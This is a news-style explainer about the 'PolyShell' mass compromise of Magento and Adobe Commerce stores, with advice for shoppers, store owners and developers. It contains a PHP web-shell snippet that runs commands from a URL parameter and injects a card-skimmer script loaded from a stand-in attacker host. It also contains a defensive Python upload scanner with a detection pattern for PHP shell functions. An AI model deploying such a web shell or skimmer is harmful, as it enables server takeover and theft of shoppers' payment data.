WND
Cybersecurity 5 min read

7,500 Stores Hit: The 'PolyShell' Attack Targeting Your Credit Card Data

A massive Adobe Commerce exploit has compromised thousands of online stores. Learn how the PolyShell flaw works and how to protect your financial data.

Your credit card data might be on a hacker’s server right now.

If you bought anything from an independent online boutique or a niche e-commerce site in the last 24 hours, stop what you’re doing and check your bank statement. Over 7,500 websites running on Adobe Commerce and Magento were compromised overnight in a coordinated mass-exploitation event.

This isn’t just a simple website defacement. Hackers used a flaw dubbed PolyShell to bypass security filters and inject malicious scripts directly into the checkout flow.

The goal? To scrape your credit card number, CVV, and expiry date the exact moment you hit “purchase.”

What Happened

Security researchers at Sansec and other firms began tracking a massive spike in automated attacks targeting a specific file upload vulnerability. Within hours, the number of infected stores ballooned from a few dozen to several thousand.

  • The Scale: Over 7,500 domains have been confirmed as compromised.
  • The Target: Small to medium-sized businesses using Adobe Commerce and the open-source Magento platform.
  • The Payload: Attackers are uploading “web shells”—backdoors that give them total control over the server.
  • The Result: Malicious JavaScript is injected into the payment pages, a technique known as Magecart or digital skimming.

Why This Matters

Think of this like a physical card skimmer found on a gas pump, but invisible and deployed to thousands of pumps simultaneously.

Before this attack, these stores were considered “secure” because they used HTTPS. But HTTPS only protects data in transit from your computer to the server. If the server itself is compromised, the data is stolen before it even gets encrypted for the bank.

For store owners, this is a nightmare. A single breach can lead to massive fines from payment processors and a total loss of customer trust. For you, the shopper, it means your identity and financial health are on the line.

How It Works

The PolyShell vulnerability exploits how the server handles file uploads. Usually, a server checks if a file is an image (like a product photo) before saving it.

Attackers found a way to “polyglot” a file—making it look like a harmless .jpg to the security filter, while actually containing executable PHP code. Once the file is on the server, the attacker calls it via a URL, and the server executes the hidden code.

Here is a simplified example of how a malicious payload might look when hidden inside a fake image file:

<?php
// A fake JPEG header to fool basic filters
// \xFF\xD8\xFF\xE0 (Actual binary data would go here)

// The 'PolyShell' logic
if(isset($_GET['cmd'])) {
    // This line allows the hacker to run any command on the store's server
    system($_GET['cmd']); 
}

// The script then injects a skimmer into the checkout page
$skimmer = "<script src='https://cdn-malicious-stats.com/track.js'></script>";
file_put_contents('pub/static/frontend/checkout.js', $skimmer, FILE_APPEND);
?>

By appending that script to the checkout page, the attacker ensures that every time a customer enters their card details, a copy is sent to the attacker’s server at cdn-malicious-stats.com.

What to Do Next

  • For Shoppers: Check your credit card statements for any unauthorized charges, even small ones ($1 or $2). If you shopped at a small online store recently, consider freezing your card and requesting a new number. Use Apple Pay, Google Pay, or PayPal whenever possible, as these methods don’t share your actual card details with the merchant.

  • For Store Owners: Immediately check your server for new or suspicious files in the /media or /pub/static directories. Apply the latest security patches from Adobe (specifically addressing CVE-2024-34102 and related flaws).

  • For Developers: Implement strict file-type validation that goes beyond extension checking. Use tools like Sansec eComscan to scan your codebase for injected malware and unauthorized admin accounts created during the window of exploitation.
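As an added illustration of the checks the list above recommends (example code written for this article, not Adobe's, Magento's or Sansec's), this Python checker rejects a file whose name, magic bytes and body do not agree, and walks an upload directory to flag files that fail; the allowlist, marker list and sample bytes are constructed.

```python
import os
import re

# Magic bytes for the image types a product-photo upload should accept (constructed allowlist)
IMAGE_SIGNATURES = {
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "png": [b"\x89PNG\r\n\x1a\n"],
    "gif": [b"GIF87a", b"GIF89a"],
}

# PHP open tags and a few functions a dropper relies on; any of them inside an "image" is a red flag
PHP_MARKERS = re.compile(rb"<\?php|<\?=|\b(?:system|passthru|shell_exec|eval|file_put_contents)\s*\(", re.I)


def inspect_upload(filename, data):
    """Return a list of findings for a file claiming to be an image; an empty list means it passed."""
    findings = []
    parts = filename.lower().split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    if ext not in IMAGE_SIGNATURES:
        findings.append(f"extension '.{ext}' is not an allowed image type")
    # 'shell.php.jpg' style names hide an executable extension behind the image extension
    if any(p in ("php", "phtml", "phar") for p in parts[1:-1]):
        findings.append("double extension hides a PHP extension")
    # The bytes must match what the extension claims, not just the name
    if ext in IMAGE_SIGNATURES and not any(data.startswith(sig) for sig in IMAGE_SIGNATURES[ext]):
        findings.append(f"content does not start with a valid {ext} header")
    # A polyglot passes the header check, so also look for PHP inside the body
    m = PHP_MARKERS.search(data)
    if m:
        findings.append(f"PHP marker {m.group(0)[:20]!r} found at offset {m.start()}")
    return findings


def scan_directory(root):
    """Walk an upload tree (e.g. pub/media) and report every file that fails inspect_upload."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                findings = inspect_upload(name, fh.read())
            if findings:
                report[path] = findings
    return report


# Constructed samples: a minimal JPEG-like blob, and the same header with a harmless PHP tag embedded
CLEAN_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32 + b"\xff\xd9"
POLYGLOT_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32 + b"<?php echo 'x'; ?>" + b"\xff\xd9"
```

Run scan_directory against a copy of the media tree taken before cleanup; the finding offsets tell you where in each file the planted code begins.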
